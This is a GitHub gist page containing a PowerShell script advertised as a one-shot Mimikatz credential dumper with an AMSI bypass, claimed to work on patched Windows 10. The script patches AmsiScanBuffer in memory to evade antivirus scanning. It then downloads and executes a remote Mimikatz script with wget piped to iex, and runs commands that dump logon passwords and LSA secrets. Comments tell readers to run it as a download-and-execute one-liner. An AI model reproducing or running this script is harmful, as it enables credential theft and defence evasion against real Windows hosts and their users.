Skip to content

Instantly share code, notes, and snippets.

Forked from pich4ya/Invoke-OneShot-Mimikatz.ps1
Last active August 12, 2022 08:08
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# Confirm it works in Windows 10 2022
# Dont download this but execute the next line in command prompt(cmd.exe)
# powershell iex (wget
# You will get creds
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)
$code = @"
using System;
using System.Runtime.InteropServices;
public class WinApi {
public static extern IntPtr LoadLibrary(string name);
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out int lpflOldProtect);
Add-Type $code
$amsiDll = [WinApi]::LoadLibrary("amsi.dll")
$asbAddr = [WinApi]::GetProcAddress($amsiDll, "Ams"+"iScan"+"Buf"+"fer")
$ret = [Byte[]] ( 0xc3, 0x80, 0x07, 0x00,0x57, 0xb8 )
$out = 0
[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, 0x40, [ref] $out)
[System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $asbAddr, $ret.Length)
[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, $out, [ref] $null)
# nishang - 2.2.0 (Jul 24, 2021)
# Change this to "attacker-local-ip" for internal sources
wget('').Content |iex
# Double single quote here is by intention.
Invoke-SoHighSoHigh -Command '"privile''ge::debug" "token::elevate" "sekurlsa::logonPasswords full" "lsadump::secrets"'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment